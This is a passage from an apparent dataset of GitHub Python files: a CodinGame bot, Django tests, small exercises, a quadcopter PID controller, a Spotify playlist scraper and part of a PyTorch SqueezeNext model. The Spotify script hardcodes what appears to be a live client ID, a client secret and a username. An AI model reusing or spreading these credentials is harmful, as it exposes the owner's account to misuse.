Distance\n :rtype: float\n \"\"\"\n return (self.x - other_point.x) ** 2 + (self.y - other_point.y) ** 2\n\n def __eq__(self, other_point):\n \"\"\" Override the equals operator to compare coordinates\n\n :param other_point: The other Point2D\n :return: True if points are equal else False\n :type: bool\n \"\"\"\n return self.x == other_point.x and self.y == other_point.y\n\n def to_dict(self):\n \"\"\" Converts point to python dict\n\n :return: dict of x,y coordinates\n :rtype: dict\n \"\"\"\n return {\"x\": self.x, \"y\": self.y}\n\n def slope(self, other_point):\n \"\"\" Calculates the slope between this point and another Point2D\n\n :param other_point: The other point to find the slope with\n :return: Slope as a float\n \"\"\"\n # TODO Find a better way to handle this error\n if self.x == other_point.x:\n raise None\n # cast to float just in case there is an integer passed in\n return (self.y - other_point.y) / float(self.x - other_point.x)\n\n def angle_deg(self, other_point):\n \"\"\" Calculates the angle in degrees between this point and another Point2D\n\n :param other_point: The other Point2D\n :return: The angle in Degrees\n \"\"\"\n if self.x != other_point.x:\n return 180 * math.atan(other_point.slope(self)) / math.pi\n\n return 90 if other_point.y > self.y else -90\n\n def pos_angle_deg(self, other_point):\n angle = self.angle_deg(other_point)\n return angle if angle >= 0 else angle + 180.0\n\n def __str__(self):\n return \"Point2D({},{})\".format(self.x, self.y)\n\n def __add__(self, other):\n if type(other) == type(self):\n return Point2D(self.x + other.x, self.y + other.y)\n else:\n return Point2D(self.x + other, self.y + other)\n\n def __radd__(self, other):\n return Point2D.__add__(self, other)\n\n @staticmethod\n def find_distance(point1, point2):\n \"\"\" finds the distance between points\n\n :param point1:\n :param point2:\n :return:\n \"\"\"\n result = math.sqrt(point2.square_distance(point1))\n return result\n\n\nclass Entity(object):\n def __init__(self, position: Point2D, velocity: Point2D, state: int, entity_id: int):\n self.position = position\n self.velocity = velocity\n self.state = state\n self.entity_id = entity_id\n self.velocity_position = self.position + self.velocity\n self.guardian = False\n self.attacker = True\n\n def find_distance(self, entity2):\n \"\"\" finds the distance between points\n\n :param point2:\n :return:\n \"\"\"\n return Point2D.find_distance(self.position, entity2.position)\n\n def find_angle(self, entity2):\n a_b = self.find_distance(entity2)\n a_c = Point2D.find_distance(self.position, self.velocity_position)\n b_c = Point2D.find_distance(entity2.position, self.velocity_position)\n # print(\"Debug messages...\", a_b, a_c, b_c, file=sys.stderr)\n if (-2 * a_c * a_b * b_c) == 0:\n return math.pi\n else:\n top = ((b_c ** 2) - (a_c ** 2) - (a_b ** 2))\n bottom = (-2 * a_c * a_b)\n # print(\"Debug messages...\", top, bottom, file=sys.stderr)\n\n angle_a = math.acos(top / bottom)\n return angle_a\n\n def find_thrust(self, entity2):\n thrust_ = abs(int(math.cos(self.find_angle(entity2)) * 150))\n\n\ndef find_closest(entity1, entity_dict, key):\n itr = 0\n lowest = None\n place = 0\n for j in entity_dict.get(key):\n low_check = entity1.find_distance(j)\n # print(\"Debug messages...D\", key, low_check, file=sys.stderr)\n if (lowest is None or low_check < lowest):\n place = itr\n lowest = low_check\n itr += 1\n ent = entity_dict.get(key)[place]\n return ent, lowest\n\n\nmy_team_id = int(input()) # if 0 you need to score on the right of the map, if 1 you need to score on the left\nmy_goal = Point2D(0, 3750) if my_team_id == 0 else Point2D(16000, 3750)\nobliv_count = 5\ncast_obliv = False\nmana = 0\ncntr_pt = Point2D(8000, 3750)\n# game loop\nwhile True:\n mana += 1\n my_score, my_magic = [int(i) for i in input().split()]\n opponent_score, opponent_magic = [int(i) for i in input().split()]\n entities = int(input()) # number of entities still in game\n entity_dict = {\n \"WIZARD\": [],\n \"OPPONENT_WIZARD\": [],\n \"SNAFFLE\": [],\n \"BLUDGER\": []\n }\n if obliv_count == 5:\n cast_obliv = False\n else:\n obliv_count += 1\n\n for i in range(entities):\n # entity_id: entity identifier\n # entity_type: \"WIZARD\", \"OPPONENT_WIZARD\" or \"SNAFFLE\" (or \"BLUDGER\" after first league)\n # x: position\n # y: position\n # vx: velocity\n # vy: velocity\n # state: 1 if the wizard is holding a Snaffle, 0 otherwise\n magic = False\n entity_id, entity_type, x, y, vx, vy, state = input().split()\n entity_id = int(entity_id)\n x = int(x)\n y = int(y)\n vx = int(vx)\n vy = int(vy)\n state = int(state)\n # print(\"Debug messages...\", entity_type, x, y, file=sys.stderr)\n entity_dict[entity_type].append(Entity(Point2D(x, y), Point2D(vx, vy), state, entity_id))\n # print(\"Debug messages...\", entity_dict, file=sys.stderr)\n if len(entity_dict.get(\"SNAFFLE\")) == 1:\n if Point2D.find_distance(entity_dict.get(\"WIZARD\")[0].position, my_goal) <= Point2D.find_distance(\n entity_dict.get(\"WIZARD\")[1].position, my_goal):\n entity_dict.get(\"WIZARD\")[0].guardian = True\n entity_dict.get(\"WIZARD\")[1].guardian = False\n else:\n entity_dict.get(\"WIZARD\")[1].guardian = True\n entity_dict.get(\"WIZARD\")[0].guardian = False\n for i in range(2):\n\n wiz = entity_dict.get(\"WIZARD\")[i]\n\n # Write an action using print\n # To debug: print(\"Debug messages...\", file=sys.stderr)\n if wiz.state == 0 and not wiz.guardian:\n nearest_snaffle, nearest_snaffle_dist = find_closest(wiz, entity_dict, \"SNAFFLE\")\n nearest_bludger, nearest_bludger_dist = find_closest(wiz, entity_dict, 'BLUDGER')\n nearest_other_wiz, nearest_other_wiz_dist = find_closest(wiz, entity_dict, \"OPPONENT_WIZARD\")\n # print(\"Debug messages...\", nearest_bludger, nearest_snaffle_dist, nearest_bludger_dist, nearest_other_wiz_dist, file=sys.stderr)\n if (mana > 25 or (mana % 17 == 0 and mana != 0)) and (\n (nearest_snaffle_dist > 5222) or len(entity_dict.get(\"SNAFFLE\")) <= 2) and magic == False:\n magic = True\n print(\"ACCIO \" + str(nearest_snaffle.entity_id))\n mana -= 15\n elif (mana > 32 or (mana % 22 == 0 and mana != 0)) and (\n nearest_snaffle_dist > nearest_other_wiz.find_distance(nearest_snaffle)):\n magic = True\n mana -= 20\n print(\"FLIPENDO \" + str(nearest_other_wiz.entity_id))\n elif (mana > 32 or (mana % 22 == 0 and mana != 0)) and (nearest_bludger_dist < 3000):\n magic = True\n mana -= 20\n print(\"FLIPENDO \" + str(nearest_bludger.entity_id))\n elif (mana > 25 or (mana % 17 == 0 and mana != 0)) and (\n nearest_snaffle_dist > nearest_other_wiz.find_distance(nearest_snaffle)) and magic == False:\n magic = True\n print(\"ACCIO \" + str(nearest_snaffle.entity_id))\n mana -= 15\n elif (mana > 22 or (mana % 12 == 0 and mana != 0)) and magic == False and nearest_other_wiz_dist < 5222:\n magic = True\n mana -= 10\n print(\"PETRIFICUS \" + str(nearest_other_wiz.entity_id))\n elif (((mana % 6 == 0 and mana != 0 and nearest_bludger_dist <= 3000) or (\n mana > 16 and nearest_bludger_dist <= 5222)) and nearest_bludger_dist < nearest_other_wiz_dist) and cast_obliv == False:\n obliv_count = 0\n cast_obliv = True\n # magic = True\n print(\"OBLIVIATE \" + str(nearest_bludger.entity_id))\n mana -= 5\n else:\n itr = 0\n lowest = None\n place = 0\n for j in entity_dict.get(\"SNAFFLE\"):\n low_check = wiz.find_distance(j)\n if (lowest is None or low_check < lowest) and j.state == 0:\n place = itr\n lowest = low_check\n itr += 1\n ent = entity_dict.get(\"SNAFFLE\")[place]\n thrust = entity_dict.get(\"WIZARD\")[i].find_thrust(ent)\n # print(\"Debug messages...\", thrust, file=sys.stderr)\n print(\"MOVE \" + str(ent.velocity_position.x) + \" \" + str(ent.velocity_position.y) + \" \" + str(150))\n elif wiz.guardian:\n nearest_snaffle, nearest_snaffle_dist = find_closest(wiz, entity_dict, \"SNAFFLE\")\n nearest_bludger, nearest_bludger_dist = find_closest(wiz, entity_dict, 'BLUDGER')\n nearest_other_wiz, nearest_other_wiz_dist = find_closest(wiz, entity_dict, \"OPPONENT_WIZARD\")\n if entity_dict.get(\"WIZARD\")[i].state == 1:\n if Point2D.find_distance(center_pt, entity_dict.get(\"WIZARD\")[i].position) > Point2D.find_distance(\n entity_dict.get(\"WIZARD\")[i].position, entity_dict.get(\"WIZARD\")[i - 1].position):\n print(\"THROW \" + str(entity_dict.get(\"WIZARD\")[i - 1].position.x) + \" \" + str(\n entity_dict.get(\"WIZARD\")[i - 1].position.y) + \" \" + \"500\")\n else:\n if my_team_id == 0:\n print(\"THROW \" + str(16000) + \" \" + str(3750) + \" \" + \"500\")\n else:\n print(\"THROW \" + str(0) + \" \" + str(3750) + \" \" + \"500\")\n elif (mana > 32 or (mana % 22 == 0 and mana != 0)) and (\n nearest_snaffle_dist > nearest_other_wiz.find_distance(nearest_snaffle)):\n # magic = True\n mana -= 20\n print(\"FLIPENDO \" + str(nearest_other_wiz.entity_id))\n elif (mana > 22 or (mana % 12 == 0 and mana != 0)) and nearest_other_wiz.find_distance(\n nearest_snaffle) < 5222:\n # magic = True\n mana -= 10\n print(\"PETRIFICUS \" + str(nearest_other_wiz.entity_id))\n elif nearest_snaffle_dist < 5000:\n print(\"MOVE \" + str(nearest_snaffle.velocity_position.x) + \" \" + str(\n nearest_snaffle.velocity_position.y) + \" \" + str(150))\n else:\n if my_team_id == 0:\n print(\"MOVE \" + str(122) + \" \" + str(3750) + \" \" + \"150\")\n else:\n print(\"MOVE \" + str(15878) + \" \" + str(3750) + \" \" + \"150\")\n elif entity_dict.get(\"WIZARD\")[i].state == 1:\n if my_team_id == 0:\n print(\"THROW \" + str(16000) + \" \" + str(3750) + \" \" + \"500\")\n else:\n print(\"THROW \" + str(0) + \" \" + str(3750) + \" \" + \"500\")\n else:\n print(\"MOVE 8000 3750 100\")\n # Edit this line to indicate the action for each wizard (0 ≤ thrust ≤ 150, 0 ≤ power ≤ 500)\n # i.e.: \"MOVE x y thrust\" or \"THROW x y power\"\n\n","repo_name":"DarkPhoenix6/My_Libraries","sub_path":"Python/codeingames/fantastic_bits.py","file_name":"fantastic_bits.py","file_ext":"py","file_size_in_byte":12019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30673134701","text":"from django.test import TestCase, Client\nfrom .models import Question, Answer\nfrom django.contrib.auth.models import User\n# Create your tests here.\n\nclass MainTestCase(TestCase) :\n def test_url (self) :\n response2 = Client().get(\"/question/\")\n self.assertEqual(response2.status_code,200)\n\n response3 = Client().get(\"/question/1/\")\n self.assertEqual(response3.status_code,200)\n\n response = Client().get(\"/question/all?q=\")\n self.assertEqual(response.status_code, 200)\n\n\n def test_model (self) :\n user = User.objects.create_user('testing', 'testing@testing.com', 'testing8888')\n ans = Answer.objects.create(user=user, answer='ini jawabannya')\n Question.objects.create(user=user, question='ini pertanyaan')\n Question.objects.get(pk=1).answer.add(ans)\n\n self.assertEqual(1, Question.objects.count())\n self.assertEqual(1, Answer.objects.count())\n\n def test_template_used(self) :\n response = Client().get(\"/question/\")\n self.assertTemplateUsed(response, \"pertanyaan/pertanyaan.html\")\n\n response2 = Client().get(\"/question/1/\")\n self.assertTemplateUsed(response2,\"pertanyaan/detail.html\")\n \n def test_element_in_template(self) :\n user = User.objects.create_user('testing', 'testing@testing.com', 'testing8888')\n ans = Answer.objects.create(user=user, answer='ini jawabannya')\n Question.objects.create(user=user, question='ini pertanyaan')\n Question.objects.get(pk=1).answer.add(ans)\n\n response = Client().get(\"/question/\")\n html_response = response.content.decode('utf8')\n self.assertIn(\"ini pertanyaan\", html_response)\n\n\n response = Client().get(\"/question/1/\")\n html_response = response.content.decode('utf8')\n self.assertIn(\"ini jawabannya\", html_response)\n\n def test_search(self) :\n user = User.objects.create_user('testing', 'testing@testing.com', 'testing8888')\n Question.objects.create(user=user, question='ini pertanyaan')\n response = self.client.get('/question/', data={'search' : \"ini\"})\n html_response = response.content.decode('utf8')\n self.assertIn(\"ini\", html_response)\n\n response = self.client.get('/question/', data={'search' : \"itu\"})\n html_response = response.content.decode('utf8')\n self.assertIn(\"There are no question\", html_response)\n\n\n def test_menjawab(self) :\n user = User.objects.create_user('testing', 'testing@testing.com', 'testing8888') # create user\n Question.objects.create(user=user, question='ini pertanyaan') # create pertanyaan\n\n # testing jawab pertanyaan ketika user sudah login\n self.client.login(username='testing', password='testing8888') # login user\n response = self.client.post('/question/1/', data={\"addAnswer\" : \"mauTanya\", \"answer\" : \"ini pertanyaan\", \"addAnswer\" : \"add\" })\n self.assertEqual(Question.objects.get(pk=1).answer.all()[0].answer, \"ini pertanyaan\")\n\n\n # testing jawab pertanyaan ketika user sudah logout\n self.client.logout()\n response = self.client.post('/question/1/', data={\"addAnswer\" : \"add\" })\n self.assertEqual(response.status_code, 302)\n\n\n def test_bertanya(self) :\n user = User.objects.create_user('testing', 'testing@testing.com', 'testing8888') # create user\n # testing jawab pertanyaan ketika user sudah login\n self.client.login(username='testing', password='testing8888') # login user\n response = self.client.post('/question/add/', data={\"question\" : \"ini pertanyaan\", \"addQuestion\" : \"add\" })\n self.assertEqual(Question.objects.get(question='ini pertanyaan').question, \"ini pertanyaan\")\n\n self.client.logout()\n response = self.client.post('/question/', data={\"addQuestion\" : \"add\" })\n self.assertEqual(response.status_code, 302)\n\n \n\n\n\n \n\n\n","repo_name":"SinusCosinusTangen/donasi-covid-19-2","sub_path":"pertanyaan/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4274494277","text":"import sys\n\nsys.setrecursionlimit(2000)\nprint(sys.getrecursionlimit())\n\ndef greet(): # function calling itself is known as recursion\n print('hello')\n greet()\n\n#greet() \n\n# 5! USING RECURSION\n\ndef factorial(a):\n if a==0:\n return 1\n return a * factorial(a-1) # it is working like 5*4*factorail(4-1).....\n # return 5*4*3*2*1*1\n\nresult=factorial(5)\nprint(result) ","repo_name":"debankanmitra/Python4e","sub_path":"recursion.py","file_name":"recursion.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26383044689","text":"filePath = \"./Room Capacities.csv\"\n\n# Setup dictionary to hold room name and capacity\nroomCapacityDict = {}\n\n# 1. Read the contents of the file\n\nwith open(filePath) as fileHandle:\n \n # Store each line in the dictionary, cleaning as necessary\n for line in fileHandle.readlines():\n # 2. Filter/clean data as necessary\n\n # Don't store the first line of the file, as this is a header\n if (line[0:4] != \"Room\"):\n # Remove white space from line, including new line character\n lineCleaned = line.strip()\n \n # Separate the line in to two parts, store as list\n lineSplit = lineCleaned.split(\",\")\n \n roomName = lineSplit[0]\n roomCapacity = lineSplit[1]\n \n # 3. Store data in a dictionary for comparison\n roomCapacityDict[roomName] = roomCapacity\n\n# Optional: Print list of available rooms for the user\nprint(\"Available Rooms:\")\nfor roomName in roomCapacityDict.keys():\n print(roomName)\n\n# Add line separator between room names and user input\nprint(\"\\n\")\n\n\n\n# 4. Ask user for room name as input\n# Optional: Ensure user selects a room that exists\nuserRoomNameInput = \"\"\nwhile (userRoomNameInput not in roomCapacityDict.keys()):\n \n # Ask for and store user input\n userRoomNameInput = input(\"Which room will you be using: \")\n \n # If the room the user is trying to use does not exist, inform the user.\n # When the loop cycles through, the user will be asked to input the room again\n if (userRoomNameInput not in roomCapacityDict.keys()):\n print(\"Room name not found. Please select the name of a room within the building. Available names are as follows: \")\n \n # This is a list comprehension, a short-hand form of a for loop\n [print(room) for room in roomCapacityDict.keys()]\n\n\n\n# 5. Ask user for number of attendees using room\nuserCapacityInput = input(\"How many members will attend: \")\n\n# 6. Check if the room can accommodate, and report\nchosenRoomCapacity = roomCapacityDict[userRoomNameInput]\n\n# Optional: Output user's data and room data\nprint(\"Chosen room: \",userRoomNameInput)\nprint(\"Attendees: \", userCapacityInput)\nprint(\"Room Limit: \", chosenRoomCapacity)\n\n# Finally, report if the room can accommodate the employees or not\nif (int(chosenRoomCapacity) < int(userCapacityInput)):\n print(\"Number of attendees exceeds room capacity\")\nelse:\n print(\"Room can accommodate number of attendees\")\n \n \n\"\"\"\nEnding Notes:\n \n This example shows some user input, as well as how to check for simple\n errors that may occur due to the user not inputting correct values.\n \n The code also shows how to filter/clean data from an ideal .csv file. User\n input and data errors require more focused scrubbing.\n\"\"\" \n \n \n","repo_name":"dbowmans46/PracticalProgramming","sub_path":"Session 7 - Python/Instructional Material/Worked Example Problems/Problem 2 - Meeting Capacity Checker.py","file_name":"Problem 2 - Meeting Capacity Checker.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7833614540","text":"# 2. Trailing Zeros \n# Write an algorithm which computes the number of trailing zeros in n factorial.\n# \n# Have you met this question in a real interview? Yes\n# Example\n# 11! = 39916800, so the out should be 2\n\nclass Solution:\n \"\"\"\n @param: n: An integer\n @return: An integer, denote the number of trailing zeros in n!\n \"\"\"\n def trailingZeros(self, n):\n # write your code here, try to do it without arithmetic operators\n res = 0\n i = 5\n while i <= n:\n res += n // i\n i *= 5\n return res\n \n","repo_name":"yihanc/LC","sub_path":"LINTCODE/2_trailing_zeros.py","file_name":"2_trailing_zeros.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17117974527","text":"import numpy as np\nfrom transforms3d import quaternions, euler\n\neuler = euler.EulerFuncs('rxyz')\n\ndef skew_symmetric(vec):\n mat = np.array(\n [\n [0, -vec[2], vec[1]],\n [-vec[2], 0 , vec[0]],\n [vec[1], vec[0], 0]\n ]\n )\n\n return mat\nclass PIDController:\n def __init__(self, dt, p_gain, i_gain = 0, d_gain = 0, sat=None, name = 'default'):\n self.name = name\n self.dt = dt\n self.p_gain = p_gain\n self.i_gain = i_gain\n self.d_gain = d_gain\n self.sat = sat\n self.integrated_error = 0.\n self.prev_error = 0.\n def update(self, sp, fb):\n \"\"\"Update gains\n\n Args:\n sp (float): reference signal Set point\n fb (float): Sensor Feedback\n\n Returns:\n output (float): command signal\n\n \"\"\"\n dt = self.dt\n error = sp - fb\n self.integrated_error = self.integrated_error + (self.prev_error + error) / 2 * dt\n p_term = self.p_gain * (error)\n i_term =self.i_gain * (self.integrated_error)\n d_term = self.d_gain * (error - self.prev_error) / dt\n output = p_term + i_term + d_term\n self.prev_error = error\n if (self.sat is not None):\n # set Saturation\n output = min(output, self.sat)\n output = max(output, -self.sat)\n return output\n\n @property\n def reset_integral(self):\n self.integrated_error = 0\n\n\ndef quar_axis_error(q_sp, q_state):\n \"\"\"Compute the error in quaternions from the setpoints and robot state\n\n Args:\n q_sp (np.array): Reference signal Set point quaternion\n q_state (np.array): Sensor Feedback quaternion\n Returns:\n exponential angle (np.array)\n \"\"\"\n\n # Quaternion multiplication q_set * (q_state)' target - state\n\n q_state_conj = quaternions.qconjugate(q_state)\n q_error = quaternions.qmult(q_sp,q_state_conj)\n\n # Nearest rotation\n if (q_error[0] < 0):\n q_error = -1. * q_error\n\n axis_error = quaternions.quat2axangle(q_error)\n return axis_error[0] * axis_error[1]\n\ndef thrust_tilt(eulAng,PWM_hover):\n\n phi = eulAng[0] # Roll\n theta = eulAng[1] # Pitch\n psi = eulAng[2]\n scaling = 1./(abs(np.sqrt(np.cos(phi)*np.cos(theta))))\n scaling = min (scaling, 1.3)\n return PWM_hover*scaling\n\n\nclass FlightComputer:\n def __init__(self, dt, fc_config):\n gains = fc_config['gains']\n self.roll_controller = PIDController(dt, gains['Kp_roll'], sat= gains['PR_SAT'], name='Roll')\n self.pitch_controller = PIDController(dt, gains['Kp_pitch'], sat = gains['PR_SAT'], name='Pitch')\n self.yaw_controller = PIDController(dt, gains['Kp_yaw'], name='Yaw')\n self.alt_controller = PIDController(dt, gains['Kp_vzSAT'], sat = gains['Kp_vzSAT'], name='Alt')\n self.p_controller = PIDController(dt,gains['Kp_p'], name='p')\n self.q_controller = PIDController(dt,gains['Kp_q'], name='q')\n self.r_controller = PIDController(dt,gains['Kp_r'], name='r')\n self.u2motor = fc_config[\"cmd2motor_map\"]\n self.esc_min = fc_config[\"esc_settings\"][\"Saturation\"][0]\n self.esc_max = fc_config[\"esc_settings\"][\"Saturation\"][1]\n\n self.PWM_hover = None\n\n def target_generator(self,eulAngSP):\n # Temp solution to get sp, should would be generated by guidance\n q_sp = euler.euler2quat(eulAngSP[0], eulAngSP[1], eulAngSP[2]) # XYZ\n vzSP = 0\n return q_sp, vzSP\n\n def update (self, sensor_data, eulAngSP):\n vz = sensor_data['vz']\n q_state = sensor_data['q_state']\n p = sensor_data['p']\n q = sensor_data['q']\n r = sensor_data['r']\n eulAng = np.array(euler.quat2euler(q_state))\n rateSP = np.zeros(3)\n\n q_sp, vzSP = self.target_generator(eulAngSP)\n ## Calculating quartenion error\n\n axis_error = quar_axis_error(q_sp,q_state)\n ## Cascade PID\n rateSP[0] = self.roll_controller.update(axis_error[0], 0.)\n rateSP[1] = self.pitch_controller.update(axis_error[1], 0.)\n rateSP[2] = self.yaw_controller.update(axis_error[2], 0.)\n u = np.zeros(4)\n u[0] = thrust_tilt(eulAng, self.PWM_hover[0]) -self.alt_controller.update(vzSP, vz)\n u[1] = self.p_controller.update(rateSP[0], p)\n u[2] = self.q_controller.update(rateSP[1], q)\n u[3] = self.r_controller.update(rateSP[2], r)\n\n ## ESC ##\n PWM = np.dot(self.u2motor,u)\n # ESC Saturation\n for val in range(0, 4):\n PWM[val] = min(PWM[val], self.esc_max)\n PWM[val] = max(PWM[val], self.esc_min)\n\n log = [eulAng, eulAngSP, u, PWM, rateSP]\n return PWM, log\n\n\nclass KalmanFilter:\n def __init__(self):\n self.P = np.zeros([4,4])\n\n def _est_predict(self, k_state):\n pass\n def _est_update(self):\n pass\n def update(self):\n pass\n\nclass AttitudeEstimation:\n pass","repo_name":"hassanarif87/quadcopter","sub_path":"Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":4959,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"720272525","text":"import requests\nfrom bs4 import BeautifulSoup\nimport os\nimport spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\nfrom pprint import pprint\n\nSPOTIFY_CLIENT_ID = \"57ba76a3dcfc4142b3bcaf9d7e23490b\"\nSPOTIFY_CLIENT_SECRET = \"a976a14eddd243bd8a5f1d7ff8e0e4d9\"\n\ndate_choice = input(\"What time period would you like to travel to? Please type in the format YYYY-MM-DD:\\n\")\nyear = date_choice.split('-')[0]\n\n# 1992-04-20 Save The Best For Last\nmusic_url_with_date = \"https://www.billboard.com/charts/hot-100/\"+date_choice\nbillboards_response = requests.get(music_url_with_date)\nmusic_parsed = BeautifulSoup(billboards_response.text, \"html.parser\")\nsong_titles_tags = music_parsed.find_all(name=\"span\", class_=\"chart-element__information__song text--truncate \"\n \"color--primary\")\nsong_titles_list = [titles.text for titles in song_titles_tags]\n\nspotify_scope = \"playlist-modify-private\"\n\nsp = spotipy.Spotify(\n auth_manager=SpotifyOAuth(\n client_id=SPOTIFY_CLIENT_ID,\n client_secret=SPOTIFY_CLIENT_SECRET,\n scope=spotify_scope,\n redirect_uri=\"http://example.com\",\n username=\"8cjzxg2uhs0pcpbszmiez98ro\",\n show_dialog=True,\n cache_path=\"token.txt\"\n )\n)\nsongs_search_details = {}\nuser_id = sp.current_user()[\"id\"]\n\nsong_uris = []\ncount_unavailable = 0\nfor title in song_titles_list:\n try:\n response = sp.search(q=f\"track: {title} year:{date_choice.split('-')[0]}\", type=\"track\", limit=\"1\")\n song_uris.append(response[\"tracks\"][\"items\"][-1][\"uri\"])\n except IndexError:\n count_unavailable += 1\n print(f\"{count_unavailable}: {title} is not available \")\n\ncreate_playlist_response = sp.user_playlist_create(\n name=f\"Top 100 Songs from {date_choice}\",\n public=\"false\",\n description=f\"Playlist of top 100 songs from the week of {date_choice}\",\n user=user_id,\n)\n\nplaylist_id = create_playlist_response[\"id\"]\nadd_songs_response = sp.playlist_add_items(playlist_id=playlist_id, items=song_uris)\n","repo_name":"poshpeck/spotify-palylist","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18677173846","text":"\"\"\"\n SqueezeNext for ImageNet-1K, implemented in PyTorch.\n Original paper: 'SqueezeNext: Hardware-Aware Neural Network Design,' https://arxiv.org/abs/1803.10615.\n\"\"\"\n\n__all__ = ['SqueezeNext', 'sqnxt23_w1', 'sqnxt23_w3d2', 'sqnxt23_w2', 'sqnxt23v5_w1', 'sqnxt23v5_w3d2', 'sqnxt23v5_w2']\n\nimport os\nimport torch.nn as nn\nimport torch.nn.init as init\nfrom .common import ConvBlock, conv1x1_block, conv7x7_block\n\n\nclass SqnxtUnit(nn.Module):\n \"\"\"\n SqueezeNext unit.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n stride : int or tuple/list of 2 int\n Strides of the convolution.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n stride):\n super(SqnxtUnit, self).__init__()\n if stride == 2:\n reduction_den = 1\n self.resize_identity = True\n elif in_channels > out_channels:\n reduction_den = 4\n self.resize_identity = True\n else:\n reduction_den = 2\n self.resize_identity = False\n\n self.conv1 = conv1x1_block(\n in_channels=in_channels,\n out_channels=(in_channels // reduction_den),\n stride=stride,\n bias=True)\n self.conv2 = conv1x1_block(\n in_channels=(in_channels // reduction_den),\n out_channels=(in_channels // (2 * reduction_den)),\n bias=True)\n self.conv3 = ConvBlock(\n in_channels=(in_channels // (2 * reduction_den)),\n out_channels=(in_channels // reduction_den),\n kernel_size=(1, 3),\n stride=1,\n padding=(0, 1),\n bias=True)\n self.conv4 = ConvBlock(\n in_channels=(in_channels // reduction_den),\n out_channels=(in_channels // reduction_den),\n kernel_size=(3, 1),\n stride=1,\n padding=(1, 0),\n bias=True)\n self.conv5 = conv1x1_block(\n in_channels=(in_channels // reduction_den),\n out_channels=out_channels,\n bias=True)\n\n if self.resize_identity:\n self.identity_conv = conv1x1_block(\n in_channels=in_channels,\n out_channels=out_channels,\n stride=stride,\n bias=True)\n self.activ = nn.ReLU(inplace=True)\n\n def forward(self, x):\n if self.resize_identity:\n identity = self.identity_conv(x)\n else:\n identity = x\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = self.conv5(x)\n x = x + identity\n x = self.activ(x)\n return x\n\n\nclass SqnxtInitBlock(nn.Module):\n \"\"\"\n SqueezeNext specific initial block.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels):\n super(SqnxtInitBlock, self).__init__()\n self.conv = conv7x7_block(\n in_channels=in_channels,\n out_channels=out_channels,\n stride=2,\n padding=1,\n bias=True)\n self.pool = nn.MaxPool2d(\n kernel_size=3,\n stride=2,\n ceil_mode=True)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.pool(x)\n return x\n\n\nclass SqueezeNext(nn.Module):\n \"\"\"\n SqueezeNext model from 'SqueezeNext: Hardware-Aware Neural Network Design,' https://arxiv.org/abs/1803.10615.\n\n Parameters:\n ----------\n channels : list of list of int\n Number of output channels for each unit.\n init_block_channels : int\n Number of output channels for the initial unit.\n final_block_channels : int\n Number of output channels for the final block of the feature extractor.\n in_channels : int, default 3\n Number of input channels.\n in_size : tuple of two ints, default (224, 224)\n Spatial size of the expected input image.\n num_classes : int, default 1000\n Number of classification classes.\n \"\"\"\n def __init__(self,\n channels,\n init_block_channels,\n final_block_channels,\n in_channels=3,\n in_size=(224, 224),\n num_classes=1000):\n super(SqueezeNext, self).__init__()\n self.in_size = in_size\n self.num_classes = num_classes\n\n self.features = nn.Sequential()\n self.features.add_module(\"init_block\", SqnxtInitBlock(\n in_channels=in_channels,\n out_channels=init_block_channels))\n in_channels = init_block_channels\n for i, channels_per_stage in enumerate(channels):\n stage = nn.Sequential()\n for j, out_channels in enumerate(channels_per_stage):\n stride = 2 if (j == 0) and (i != 0) else 1\n stage.add_module(\"unit{}\".format(j + 1), SqnxtUnit(\n in_channels=in_channels,\n out_channels=out_channels,\n stride=stride))\n in_channels = out_channels\n self.features.add_module(\"stage{}\".format(i + 1), stage)\n self.features.add_module(\"final_block\", conv1x1_block(\n in_channels=in_channels,\n out_channels=final_block_channels,\n bias=True))\n in_channels = final_block_channels\n self.features.add_module(\"final_pool\", nn.AvgPool2d(\n kernel_size=7,\n stride=1))\n\n self.output = nn.Linear(\n in_features=in_channels,\n out_features=num_classes)\n\n self._init_params()\n\n def _init_params(self):\n for name, module in self.named_modules():\n if isinstance(module, nn.Conv2d):\n init.kaiming_uniform_(module.weight)\n if module.bias is not None:\n init.constant_(module.bias, 0)\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n x = self.output(x)\n return x\n\n\ndef get_squeezenext(version,\n width_scale,\n model_name=None,\n pretrained=False,\n root=os.path.join(\"~\", \".torch\", \"models\"),\n **kwargs):\n \"\"\"\n Create SqueezeNext model with specific parameters.\n\n Parameters:\n ----------\n version : str\n Version of SqueezeNet ('23' or '23v5').\n width_scale : float\n Scale factor for width of layers.\n model_name : str or None, default None\n Model name for loading pretrained model.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.torch/models'\n Location for keeping the model parameters.\n \"\"\"\n\n init_block_channels = 64\n final_block_channels = 128\n channels_per_layers = [32, 64, 128, 256]\n\n if version == '23':\n layers = [6, 6, 8, 1]\n elif version == '23v5':\n layers = [2, 4, 14, 1]\n else:\n raise ValueError(\"Unsupported SqueezeNet version {}\".format(version))\n\n channels = [[ci] * li for (ci, li) in zip(channels_per_layers, layers)]\n\n if width_scale != 1:\n channels = 